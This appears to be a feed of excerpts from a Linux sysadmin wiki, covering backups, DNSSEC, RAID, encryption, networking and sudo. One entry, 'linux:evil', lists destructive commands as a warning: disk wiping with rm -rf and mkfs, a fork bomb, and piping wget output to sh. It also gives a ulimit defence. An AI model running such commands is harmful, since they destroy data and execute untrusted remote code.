tnt.aufbix.org linux

linux:amanda

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

Amanda (*nix backup solution) Configuring FIXME Server FIXME Server with tape library FIXME Client FIXME Firewall need to know bases FIXME Running amanda FIXME Labelling tapes FIXME Creating dumps FIXME FAQ/Troubleshooting FIXME Taken from the OLD tnt

linux:bacula

anonymous@undisclosed.example.com (Anonymous) — Mon, 23 Apr 2012 10:06:15 +0000

Bacula (the *nix backup solution) Bacula is an centralized backup system. I usually runs on linux (brodul only has exp. running it on linux). I can backup Gnu/Linux, UNIX, MacOS, Windows boxes. The system is separated in more daemons: - bacula-dir (director)

linux:benchmark

anonymous@undisclosed.example.com (Anonymous) — Wed, 18 Aug 2010 14:57:32 +0000

Benchmarking process / IO / latency links: * LatencyTop on Ubuntu and Debian apt-get install contest dbench stress tiobench latencytop FIXME Unix Benchmarking see: Download: UnixBench v4.1.0 - WHT Variant # gunzip -dvc unixbench-4.1.0-wht.tar.gz | tar xvf - # cd unixbench-4.1.0-wht # make # ./Run

linux:bind

anonymous@undisclosed.example.com (Anonymous) — Wed, 12 Aug 2015 14:46:31 +0000

BIND (is there anyting else?) DNSSEC dnssec-keygen -a 7 -b 2048 -n ZONE domena.org dnssec-keygen -f KSK -a 8 -b 4096 -n ZONE domena.org copy generated files in /etc/bind/keys. if you put your keys in /etc/bind/keys do not forget about permissions and apparmor!

linux:centos

anonymous@undisclosed.example.com (Anonymous) — Mon, 15 Oct 2012 11:57:36 +0000

CentOS Harden CentOS distro Script to harden a fresh CentOS 4 or 5 base server install, which installs any updated packages plus a few useful extras, removes unnecessary services and setuid bits, and does a little performance tuning. Running it more than once shouldn't hurt anything.

linux:crypto

anonymous@undisclosed.example.com (Anonymous) — Wed, 20 Oct 2010 11:56:15 +0000

Linux crypto stuff * Linux loopAES * Linux dm-crypt * Linux encfs + fuse * Linux and use of eCryptfs Benchmarking some stuff: Plain (RAW partition) Blowfish cipher AES-256 cipher

linux:debian

anonymous@undisclosed.example.com (Anonymous) — Thu, 04 Mar 2010 13:49:48 +0000

Debian GNU/Linux links: * Kernel compiling with make-kpkg * Debian kernel recompile * The Very Verbose Guide to Updating and Compiling Your Debian Kernel * Secure APT * A Collection of Debian Linux Howto 's * * SELinux Setup * Hardened Gentoo - other linux security tips HP & Debian * * Proliant Debian Wiki Network tips Interface bonding /etc/network/interfaces auto bond0 iface bond0 inet stati…

linux:desktop

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

Linux Desktop Hints and Eye-candy stuff * Openbox * * is a free, light-weight system monitor for X, that displays any information on your desktop. Conky is licensed under the GPL and runs on Linux and BSD. (configurations: ) * *

linux:dhcp

anonymous@undisclosed.example.com (Anonymous) — Fri, 20 Apr 2012 15:52:22 +0000

man dhcp-options option fqdn.no-client-update flag; When the client sends this, if it is true, it means the client \\ will not attempt to update its A record. When sent by the server to the client, it means that the client \\ should not update its own A record.

linux:dm-crypt

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

linux 2.6.x dm-crypt howto for debian-like running linux distributions Required Packages apt-get install cryptsetup hashalot Kernel 2.6.x Code maturity level options ---> o Prompt for development and/or incomplete code/drivers: on General setup ---> o Support for hot-pluggable devices: on Device Drivers ---> Multi-device support (RAID and LVM) ---> o Device mapper support: on o Crypt target support: on Cryptographic options ---> o AES cipher alg…

linux:ecryptfs

anonymous@undisclosed.example.com (Anonymous) — Wed, 20 Oct 2010 11:57:02 +0000

eCryptfs is a kernel-native stacked cryptographic filesystem for Linux. Stacked filesystems layer on top of existing mounted filesystems that are referred to as lower filesystems. eCryptfs is a stacked filesystem that encrypts and decrypts the files as they are written to or read from the lower filesystem.

linux:encfs

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

Linux:ENCFS + FUSE see also: How To: use encrypted directories with ENCFS and FUSE, loop-aes, dm-crypt $sudo apt-get install fuse encfs $sudo adduser myuser fuse $sudo modprobe fuse$mkdir /home/myuser/.encrypted $mkdir /home/myuser/encrypted$encfs /home/myuser/.encrypted /home/myuser/encrypted $echo “test” > /home/myuser/encrypted/test.txt $echo “test2″ > /home/myuser/encrypted/test2.txt

linux:evil

anonymous@undisclosed.example.com (Anonymous) — Fri, 04 Jan 2013 11:31:39 +0000

This is EVIL code YOU HAVE BEEN WARNED!DO understand rm -rf / mkfs.ext3 /dev/sda :(){:|:&};: DEFENDING AGAINST THE ATTACK (forkbomb attack) sudo ulimit -u 512 /etc/security/limits.confAskUbuntu any_command > /dev/sda wget http://some_untrusted_source -O- | sh

linux:ext3

anonymous@undisclosed.example.com (Anonymous) — Thu, 23 Jul 2009 15:32:04 +0000

EXT3 twickes links: * HOWTO recover deleted files on an ext3 file system Journals ext3 has 3 journal modes, Journal, Ordered, and Writeback (slowest to fastest) All it takes is a command by tune2fs. tune2fs -o journal_data_writeback /dev/sda1 This added journal_data_writeback to the default ext3 mount options for that partition. So if ext3 is mounted without options saying otherwise, or specifically with the option 'defaults', it will use writeback.

linux:ext4

anonymous@undisclosed.example.com (Anonymous) — Tue, 09 Nov 2010 09:04:32 +0000

Linux EXT4 Converting EXT3 to EXT4 This assumes, you have your disk on /dev/sdc1 your configuration may change. Also, if you want to convert your root partition, you will have to boot with another Linux, you will not be able to convert your running root partition.

linux:firewall

anonymous@undisclosed.example.com (Anonymous) — Mon, 15 Apr 2019 10:18:00 +0000

Linux IPV6 firewall how to block TOR network in realtime FS security

linux:firewall6

anonymous@undisclosed.example.com (Anonymous) — Fri, 19 Oct 2012 09:39:01 +0000

linux:firewall_blocktor

anonymous@undisclosed.example.com (Anonymous) — Fri, 06 May 2022 08:34:31 +0000

If you got tired of IRC “kiddies” coming from TOR networks or you don't want the visiting your services then this script is for you. It takes realtime list of TOR IP [servers and exit nodes] and updates your iptables list: Updated list -

linux:globettroter

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

Mobitelov komplet za UMTS, ki vsebuje Globettroter GT MAX E kartico.

linux:grsec

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

Linux / grsecurity kernel patch Grsecurity is an innovative approach to security utilizing a multi-layered detection, prevention, and containment model. It is licensed under the GPL. It offers among many other features: * An intelligent and robust Role-Based Access Control (RBAC) system that can generate least privilege policies for your entire system with no configuration

linux:grub

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

GRUB * GRUB + RAID1 * GRUB hacking for fun and profit In a nutshell: stage1: The core GRUB functionality stored in the MBR. (512 bytes) stage1.5: (optional) stage1.5 is only written if it is necessary, and it goes into the extended area after the MBR. (30KB) If you're using a filesystem that can't be relied upon to store a file as an easily readable block on disk (i.e. pretty much every FS other than ext2/3), then you need 1.5. Loading 1.5 loads actual filesystem drivers as well as exten…

linux:hyundai-mb-810

anonymous@undisclosed.example.com (Anonymous) — Thu, 13 Aug 2009 14:50:46 +0000

Hyundai MB-810 (Mobitel) on linux taken from LUGOS-LIST :) Malo je sicer tricky, ker za data uporablja ttyUSB2, za query pa ttyUSB1. Port ttyUSB0 pa pojma nimam zakaj se nuca. Poleg tega da sem v option.c zavedel product in vendor id od modema ter modul prevedel, zgleda moja konfiguracija nekako tako:

linux:ibm-z60t

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

IBM Thinkpad (Z60t, Z60*) Additional Repositories * * * Adobe Acrobat Reader 8.x * Skype 2.x Ubuntu 8.10 install IBM Z60t specific work-around fixes Wireless stops working after resume * * Sound problem after resume Sound too low

linux:ipmi

anonymous@undisclosed.example.com (Anonymous) — Wed, 27 Oct 2010 12:26:03 +0000

apt-get install ipmitool openhpi-plugin-ipmi openhpi-plugin-ipmidirect lm-sensors modprobe ipmi_msghandler modprobe ipmi_devintf modprobe ipmi_si ports=0xca8 regspacings=4

linux:iptables

anonymous@undisclosed.example.com (Anonymous) — Fri, 25 Oct 2013 15:16:35 +0000

Linux filtering / firewalling (netfilter/iptables stuff) P2P blocking/limiting Links * * * * Debian ipp2p+l7 patch cookbook * py-htbstat - is a tool for collecting HTB kernel statistics, it allows to view graphs and perform basic analysis. * FTester -- Firewall and IDS Testing tool Netfilter concept / network flow

linux:ipv6

anonymous@undisclosed.example.com (Anonymous) — Sat, 27 Oct 2012 13:13:03 +0000

IPv6 in Linux * Building an IPv6 router with GNU/Linux * Gentoo IPv6 Router Guide - good notes on dhcp/dns IPv4-IPv6 Tunnels HE IPv6 Tunnel Broker SIXXS Tunnel Broker FIXME Basic configuration (Debian/ubuntu) Basic configuration (RHEL/Fedora/CentOS) Save and close the file. Restart networking: # service network restart

linux:isc_dhcp_client_customizing

anonymous@undisclosed.example.com (Anonymous) — Fri, 08 Jan 2010 02:42:10 +0000

Playing with dhclient Goal Sometimes one is faced with a difficult task - a backup link that requires DHCP to configure the interface. In itself, the task does not seem hard. The devil, however, is in the detail. The backup link default route(s) should not be inserted into the default routing table, but rather into a separate table.

linux:ite-it8212

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

linux:kannel

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

/etc/modems.conf group = modems id = “mc35” name = “mc35” detect-string = “SIEMENS” detect-string2 = “MC35” init-string = “AT+CNMI=3,2,0,1,1” speed = autodetect

linux:kernel

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

Linux kernel Compiling the debian way see: Debian Linux Kernel Handbook bzip2 -dc /usr/src/patch.bz2 | patch -p1 --dry-run make-kpkg clean fakeroot make-kpkg --initrd --append-to-version=-custom kernel_image kernel_headers After --append-to-version= you can write any string that helps you identify the kernel, but it must begin with a minus (-) and must not contain whitespace.

linux:lilo

anonymous@undisclosed.example.com (Anonymous) — Wed, 16 May 2012 12:02:32 +0000

LILO Partition Table Backup Many of us are doing backups of all kinds of data: from regular files, databases, to full partitions or hard drives. What I have noticed that very few peoples even think about the partition table. Given the importance of the partition table I would suggest to have a backup of it, in case you will have a corrupted partition table, if you made a change by mistake or even if that gets deleted somehow (by mistake or intentionally). You still have the data on the disk bu…

linux:loopaes

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

linux:lvm

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

Logical Volume Manager * Consistent backup with Linux Logical Volume Manager (LVM) snapshots * Encrypted root LVM Example usage Start by looking at our existing disks cat /proc/scsi/ dmesg |grep sd Next, partition the new disks using fdisk fdisk /dev/sdb * p to Print the existing table (should be blank) * n to create a new partition

linux:minimization-rh

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

linux:mogilefs

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

MogileFS *

linux:network-tunneling

anonymous@undisclosed.example.com (Anonymous) — Fri, 01 Nov 2013 18:24:34 +0000

Network tunneling in Linux GRE tunnels GRE tunnel with 'gretap' For tunneling whole ethernet frames to 'otherside' with ability to also tunnel (vlan/802.1q) tags. ip link add gt0 type gretap remote 10.14.131.1 local 10.14.131.2 ip link gt0 up ip link set gt0 up

linux:networking

anonymous@undisclosed.example.com (Anonymous) — Wed, 24 Sep 2014 16:29:52 +0000

Linux networking Usefull links * LinuxNet - a good place where to begin * Linux Advanced Routing & Traffic Control * ADSL Bandwidth Management HOWTO * etables project - ethernet firewalling * * ttshaper - Tom's traffic shaper * The Guide to IP Layer Network Administration with Linux * HFSC Scheduling with Linux * IPv6 Linux howto * Debian IPv6 *

linux:nfs

anonymous@undisclosed.example.com (Anonymous) — Mon, 15 Oct 2012 11:57:50 +0000

Nightmare file system (NFS) start here: * * Linux-NFS Wiki page * /etc/fstab foohost:/export/data /mnt nfs tcp,rsize=8192,wsize=8192,intr,rw,bg,nosuid,noauto NFS shares get stale after a while or don't mount at all This might be caused by the fact that the server really wants to have portnumbers below 1024 for the session. Adding insecure to the exports-file fixes that. Example:

linux:openvswitch

anonymous@undisclosed.example.com (Anonymous) — Fri, 01 Nov 2013 18:33:51 +0000

Openvswitch (OVS) tips & trips Before anything - RTFF - FAQ (Frequently Asked Questions) Installation/compile Debian / from source / GIT export DEB_BUILD_OPTIONS=nocheck dpkg-buildpackage -b -us -uc -nc Configuration tips Configuration in Debian/Ubuntu via /etc/network/interfaces

linux:oracle_xe_on_debian

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

Oracle XE on Debian (Sarge) original article taken from: here see also: Installing Oracle Database 10g Release 2 on Linux x86 This document describes guide for installing Oracle 10g Express Edition (formaly known as HTML DB) on Debian based machines. About OracleXE Oracle Database Express Edition (XE) is an entry-level, small-footprint database based on the Oracle Database 10g Release 2 code base that's free to develop, deploy, and distribute; fast to download; and simple to administer.

linux:panic

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

Sometimes it is useful to panic a linux machine, specially when testing various HA setups or kdump thingies. I found that “echo c > /proc/sysrq-trigger” is not enough. It produces a kernel dump but the machine keeps running. So I went with the more

linux:perc

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

Dell PowerEdge Expandable RAID controller useful links: * On Dell's PERC 5/ * * How To Manage Dell Servers using OMSA - OpenManage Server Administrator On Linux Dell PERC 6/i and RAID monitoring A few pointers for people trying to get Dell's PERC 6/i RAID monitoring working under Ubuntu, and any other linux for that matter. It also applies to PERC 5/i too, and

linux:raid

anonymous@undisclosed.example.com (Anonymous) — Mon, 06 Jul 2009 01:30:02 +0000

Working with software RAID see also: * Gentoo Howto on RAID * growing ext3 partition on RAID1 without rebooting * LVM Debian Woody + kernel 2.4 Good article (based on the one that has already been available on old TNT site) on this topic is on URL: Debian Sarge TODO RAID5 Creating a new one mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/sda1 /dev/sdb1 /dev/sdc1

linux:redhat

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

Redhat Enterprise Linux / RHEL How do I set the real time scheduling priority of a process? In the event that a process is not achieving the desired performance performance benchmarks, it can be helpful to set CPU affinity, real-time scheduling policy and real-time scheduling priority. Experimenting with different options using the taskset and chrt commands can help determine if this approach will provide the desired results.

linux:reiserfs

anonymous@undisclosed.example.com (Anonymous) — Wed, 16 Mar 2016 22:57:33 +0000

ReiserFS & Linux Troubleshooting Basic rules of fixing b0rken ReiserFS partion The most important things I've learned while drinking with Hans Reiser and things that always saved my data on reiserfs. * make sure you have “enough” RAM * make sure you have working (not br0ken) RAM

linux:routing

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

Linux routing tips tweak linux sysctl, see this Source routing .. ip route add x.x.x.x/26 dev vlan501 src x.x.x.2 table link1 ip route add default via x.x.x.1 table link1 ip route add z.z.z.0/25 dev vlan2510 src z.z.z.20 table link2 ip route add default via z.z.z.z.1 table link2 ip route add x.x.x.0/26 dev vlan501 src x.x.x.2 ip route add z.z.z.0/25 dev vlan2510 src z.z.z.20 ip route add default via x.x.x.x.1 ip rule add from x.x.x.2 table link1 ip rule add from z.z.z.20 table l…

linux:rpm

anonymous@undisclosed.example.com (Anonymous) — Sun, 12 Dec 2010 11:46:49 +0000

Useful command list To install a package (i=install v=verbose h=show hash marks): rpm -ivh package.rpm To uninstall (erase) a package: rpm -e package-name To upgrade a package: rpm -Uvh package.rpm To test a package without installing (checks dependencies):

linux:samba

anonymous@undisclosed.example.com (Anonymous) — Tue, 17 Sep 2013 12:32:14 +0000

Samba /etc/fstab //server/share /media/cifs/ cifs rw,user,auto,credentials=/home/username/.smbcredentials,uid=1000,gid=100 1 2 $ vim .smbcredentials .smbcredentials username=foobar password=blabla $ chmod 600 .smbcredentials [global] add machine script = /usr/sbin/useradd -n -g machines -d /dev/null -s /sbin/nologin %u

linux:security

anonymous@undisclosed.example.com (Anonymous) — Tue, 15 Jun 2010 13:42:43 +0000

Linux Security Links & Stuff * Debian hardening * Security/Features in Ubuntu

linux:shorewall

anonymous@undisclosed.example.com (Anonymous) — Mon, 23 Nov 2015 11:32:31 +0000

linux:sidebar

anonymous@undisclosed.example.com (Anonymous) — Fri, 01 Nov 2013 18:22:22 +0000

Linux related stuff * Linux section * Bind - DNS * kannel * Linux flavors * Debian GNU/Linux * Ubuntu tips * Ubuntu server tips * minimization of RH-based Linux * CentOS tips * Redhat ( RHEL ) tips * Linux networking * Linux and IPv6 networking * Linux routing tips * Linux firewalling * Linux load balancing * L7 filtering cookbook * Openvswitch * Network Tunneling in Linux * DHCP * Linux Filesystems * Ext3 * Ext4 * …

linux:smart

anonymous@undisclosed.example.com (Anonymous) — Fri, 12 Nov 2010 16:43:36 +0000

linux:smartarray

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

HP Smartarray under Debian Debian GNU/Linux (kernel 2.6.x) + Smartarray 64xx (cciss0: HP Smart Array 6i Controller) more on this topic hpacucli instalation apt-get install alien libstdc++2.10-glibc2.2 wget ftp://ftp.compaq.com/pub/products/servers/supportsoftware/linux/hpacucli-7.20-16.linux.rpm

linux:squid

anonymous@undisclosed.example.com (Anonymous) — Sat, 20 Mar 2010 18:25:38 +0000

Squid ( web-cache proxy ) * Viralator ( - Squid + Perl skript) * squid-vscan () * HAVP + Squid () * How To Set Up A Caching Reverse Proxy With Squid 2.6 On Debian Etch How can I configure squid so that it never caches some web sites? Add the following line in /etc/squid/squid.conf: acl NOCACHEDOMAIN dstdomain www.redhat.com no_cache de…

linux:sudo

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

SUDO tips and tricks username ALL=PASSWD: ALL; NOPASSWD: /usr/bin/ssh # User privilege specification root ALL=(ALL) ALL foo ALL=(ALL) NOPASSWD: ALL How do I run a script as a certain user when it is called by another user with sudo? If a script that has been written needs to be run as a particular user, the /etc/sudoers file needs to be modified to include default user options.

linux:sysctl

anonymous@undisclosed.example.com (Anonymous) — Tue, 23 Feb 2016 10:52:59 +0000

Linux sysctl options Optimized sysctl TNT's default sysctl.conf Download Linux as dedicated server FIXME * /proc/net/ipv4 * Linux TCP tunning Linux as router * The ARP behaviour can be fixed by using arp_ignore and arp_announce on the WAN interface: * If you have multiple interfaces on the same subnet, you may also want to enable

linux:syslog

anonymous@undisclosed.example.com (Anonymous) — Mon, 25 May 2009 00:35:02 +0000

for remote logging use syslog-ng Ce zelis da l lokalni syslog pisejo ostali racunalnik ga pozeni z ukazom “-r” Ce ne zelis imeti --MARK--, potem klici syslog s komando “-m 0”

linux:thinkpad

anonymous@undisclosed.example.com (Anonymous) — Wed, 18 Jan 2012 08:51:06 +0000

linux:tips

anonymous@undisclosed.example.com (Anonymous) — Fri, 08 May 2015 12:09:30 +0000

General linux tips and tricks Limit the CPU usage of an application (process) - cpulimit Installation: Download last stable version of cpulimit Then extract the source and compile with make: tar zxf cpulimit-xxx.tar.gz cd cpulimit-xxx make Executable file name is cpulimit. You may want to copy it in /usr/bin.

linux:ubuntu-server

anonymous@undisclosed.example.com (Anonymous) — Mon, 08 Oct 2012 16:54:30 +0000

Ubuntu 12.04 LTS Custom Grub2 parameters For instance changing schaduler /etc/default/grub update grub # update-grub2 Ubuntu LTS (old)

linux:ubuntu

anonymous@undisclosed.example.com (Anonymous) — Fri, 26 Sep 2014 12:28:57 +0000

Updating default editor # update-alternatives --config editor Disabling compcache in Ubuntu Jaunty (and Related Swap Errors) This bug can also be seen if you are seeing errors like these: You can also see it when you print swap information with the command swapon -s – if compcache is enabled, one of the swap entries will be “ramzswap”.